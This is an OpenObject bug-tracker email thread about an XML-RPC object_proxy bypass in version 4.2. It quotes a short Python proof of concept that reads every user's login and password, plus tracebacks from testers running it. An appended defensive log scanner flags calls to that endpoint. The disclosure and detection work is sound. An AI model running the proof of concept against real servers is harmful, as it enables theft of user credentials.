./get_all_users_pass.py "nueva_2"
Traceback (most recent call last):
  File "./get_all_users_pass.py", line 27, in <module>
    db_list = dbsock.list()
  File "/usr/lib/python2.6/xmlrpclib.py", line 1199, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib/python2.6/xmlrpclib.py", line 1489, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.6/xmlrpclib.py", line 1237, in request
    errcode, errmsg, headers = h.getreply()
  File "/usr/lib/python2.6/httplib.py", line 1048, in getreply
    response = self._conn.getresponse()
  File "/usr/lib/python2.6/httplib.py", line 974, in getresponse
    response.begin()
  File "/usr/lib/python2.6/httplib.py", line 391, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python2.6/httplib.py", line 349, in _read_status
    line = self.fp.readline()
  File "/usr/lib/python2.6/socket.py", line 397, in readline
    data = recv(1)
socket.error: [Errno 104] Connection reset by peer
> Hi, I tested in stable revno.2041 and the exploit is invalid
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of the object xml-rpc interface using another
> interface called object_proxy. The only requisite is that the server is
> initialized (e.g. someone does the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar, 4.2 is tagged as mature and I can't understand why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers, in which
> some are still working on the 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login',
> 'password'])
> for u in f:
>     print ' user: %s pass: %s' % (u['login'], u['password'])
>
>
>
Hi....
Traceback (most recent call last):
File "./get_
db_list = dbsock.list()
File "/usr/lib/
return self.__
File "/usr/lib/
verbose=
File "/usr/lib/
errcode, errmsg, headers = h.getreply()
File "/usr/lib/
response = self._conn.
File "/usr/lib/
response.
File "/usr/lib/
version, status, reason = self._read_status()
File "/usr/lib/
line = self.fp.readline()
File "/usr/lib/
data = recv(1)
socket.error: [Errno 104] Connection reset by peer
on revno: 1999
2010/4/26 Cristian Salamea (GnuThink) <email address hidden>
> Hi, I tested in stable revno.2041 and the exploit is invalid
--
Best regards
Nhomar G. Hernandez M.
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://
IT services: http://
Linux-Counter: 467724
E-mails:
<email address hidden>
<email address hidden>
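
A defender's check for the endpoint named in the proof of concept above, added here as an example and not part of the thread or of OpenObject: it scans access-log lines for XML-RPC calls to services outside an expected set, so requests to /xmlrpc/object_proxy stand out even when the path is encoded or padded. The combined log format (for example from a reverse proxy in front of the server), the EXPECTED_SERVICES allowlist and the sample lines are assumptions.

```python
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Assumption: the XML-RPC services clients are meant to reach; adjust per deployment.
EXPECTED_SERVICES = {"common", "db", "object", "report", "wizard"}

# Combined log format: client ident user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def service_of(target):
    """Return the XML-RPC service named in a request target, or None."""
    path = unquote(urlsplit(target).path)   # drop the query, decode %5F and similar
    path = normpath(path or "/")            # collapse '//', './' and '../'
    parts = path.strip("/").split("/")
    if len(parts) >= 2 and parts[0] == "xmlrpc":
        return parts[1]                     # case is kept: 'Object' is not 'object'
    return None

def unexpected_service_hits(lines):
    """Yield (client, time, service, status) for calls outside the allowlist."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                        # not a request line in the assumed format
        service = service_of(m.group("target"))
        if service is not None and service not in EXPECTED_SERVICES:
            yield (m.group("client"), m.group("time"), service,
                   int(m.group("status")))

# Constructed sample lines (documentation address ranges), not taken from the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Apr/2010:10:01:02 +0000] "POST /xmlrpc/common HTTP/1.0" 200 312',
    '192.0.2.10 - - [26/Apr/2010:10:01:03 +0000] "POST /xmlrpc/object HTTP/1.0" 200 1840',
    '198.51.100.7 - - [26/Apr/2010:10:05:40 +0000] "POST /xmlrpc/db HTTP/1.0" 200 96',
    '198.51.100.7 - - [26/Apr/2010:10:05:41 +0000] "POST /xmlrpc/object_proxy HTTP/1.0" 200 2211',
    '198.51.100.7 - - [26/Apr/2010:10:05:42 +0000] "POST /xmlrpc//object%5Fproxy HTTP/1.0" 200 2211',
    '203.0.113.5 - - [26/Apr/2010:10:06:00 +0000] "GET /favicon.ico HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for client, when, service, status in unexpected_service_hits(SAMPLE_LOG):
        print("%s [%s] called /xmlrpc/%s -> HTTP %d" % (client, when, service, status))
```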